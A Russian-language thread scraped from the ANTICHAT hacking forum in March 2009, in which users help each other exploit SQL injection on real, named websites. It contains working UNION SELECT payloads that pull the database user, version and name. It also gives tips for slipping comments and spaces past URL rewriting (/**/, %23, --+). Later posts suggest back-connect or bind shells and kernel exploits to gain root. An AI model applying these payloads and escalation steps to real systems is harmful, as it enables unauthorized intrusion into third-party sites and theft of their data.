ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.03.2009, 21:18
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от Byrger
Код HTML:
http://www.gmpr.ru/news_item.php?id=699'
А дальше не воспринимает....
Код HTML:
http://www.gmpr.ru/news_item.php?id=699+group+by+400--
там же видно по ошибке что переменая вставляеться в кавычке:
PHP код:
http://www.gmpr.ru/news_item.php?id=699123123'+union+select+1,2,concat_ws(0x3A,user(),@@version,database()),4,5,6,7,8,9,10--+
Последний раз редактировалось AkyHa_MaTaTa; 18.03.2009 в 21:20..
Причина: некрасиво
|
|
|
18.03.2009, 22:25
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Если в ошибки от скули приходит с + то как поставить пробел?
И она не воспринимает -- |
|
|
|
18.03.2009, 23:02
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от Byrger
Если в ошибки от скули приходит с + то как поставить пробел?
И она не воспринимает -- Когда в MySQL используешь комент -- то после него надо ставить пробел --+, судя по всему скуля у тебя в чпу можешь попробывать использывать /**/ вместо пробелов, а в качестве комента закрываюшего оставшийся запрос - #( беда с # в том что браузер может воспринять # как анкор поэтому обычно вставляют %23 ) и если у тебя логика(считай регулярка) чпу требует что бы переменная которая вставляеться в запрос находилась между // то у тебя например когда ты делаешь вот так : /**/order/**/by/**/1#/(потому как пробелы не urldecode то и %23 наверно так и останиться %23) в качестве значения переменой пойдет ** в запрос, можешь попробывать %20 вместо пробелов(хотя если производилось urldecode запроса то и + могли бы пройти), вообшем с чпу не всегда все просто и понятно, единственым решением являеться прямое обрашения к скрипту с передачей ему нужных значений как это делает чпу что не всегда возможно по ряду причин.
|
|
|
|
19.03.2009, 08:28
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от AkyHa_MaTaTa
Когда в MySQL используешь комент -- то после него надо ставить пробел --+, судя по всему скуля у тебя в чпу можешь попробывать использывать /**/ вместо пробелов, а в качестве комента закрываюшего оставшийся запрос - #( беда с # в том что браузер может воспринять # как анкор поэтому обычно вставляют %23 ) и если у тебя логика(считай регулярка) чпу требует что бы переменная которая вставляеться в запрос находилась между // то у тебя например когда ты делаешь вот так : /**/order/**/by/**/1#/(потому как пробелы не urldecode то и %23 наверно так и останиться %23) в качестве значения переменой пойдет ** в запрос, можешь попробывать %20 вместо пробелов(хотя если производилось urldecode запроса то и + могли бы пройти), вообшем с чпу не всегда все просто и понятно, единственым решением являеться прямое обрашения к скрипту с передачей ему нужных значений как это делает чпу что не всегда возможно по ряду причин.
PHP код:
ov/'%20%23/**/+--+group+by+1--+/'
Вообще не как не пускает....а запрос выгледит так..
PHP код:
SELECT `ID`, `Name` FROM `menu` WHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/group/**/by/**/1+--+/'
В ошибке он ругается на /' тоесть похоже что запросе не прерывется (MySQL стоит...)
|
|
|
|
19.03.2009, 09:06
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
ну ты же видешь что после -- у нас идет + а должен быть пробел, попробуй так '/**/group/**/by/**/1/*/, и если подерживаеться union - '/**/union/**/select/**/1,2/*/ может последний слеш и не нужен, судя по запросу если он действительно полный то можно обойтись и вообше без коментов
'/**/union/**/select/**/1,2/**/'/
SELECT `ID`, `Name` FROM `menu` WHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/union/**/select/**/1,2/**/'/'
а вообше вылаживай линк или в пм раз сайт пентагона под прицелом.
Последний раз редактировалось AkyHa_MaTaTa; 19.03.2009 в 09:26..
|
|
|
|
19.03.2009, 21:07
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
Вопрос, это бага или нет?
http://aeiou.visao.pt/gen.pl?p=users&op=view&user=12849'
не sql injec
И ещё, как ведёт себя perl с иньекциями? (если как то ведёт вообще) и где можно почитать об этом.Просто ни разу не сталкивался...
так же как и php и asp
sql injec - проблема не интерпритации языков а проблема запросов (в основном)
где можно почитать об этом
google рулит
|
|
|
|
19.03.2009, 21:21
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Imperou$, естественно прав нехватает. повышай.
|
|
|
|
19.03.2009, 21:25
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
2 inperous
Не хватает прав. Тут как вариант - бекконект или бинд шелл - локальный сплойт что бы поднятся до рута
|
|
|
|
19.03.2009, 21:25
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
ph1l1ster
Как?
|
|
|
|
19.03.2009, 21:26
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
id - покажет права
uname -a - версию ядра
google.com - ищи сплойты под версию ядра
есть много способов по поднятию прав.
один из них - https://forum.antichat.ru/nextoldesttothread17443.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
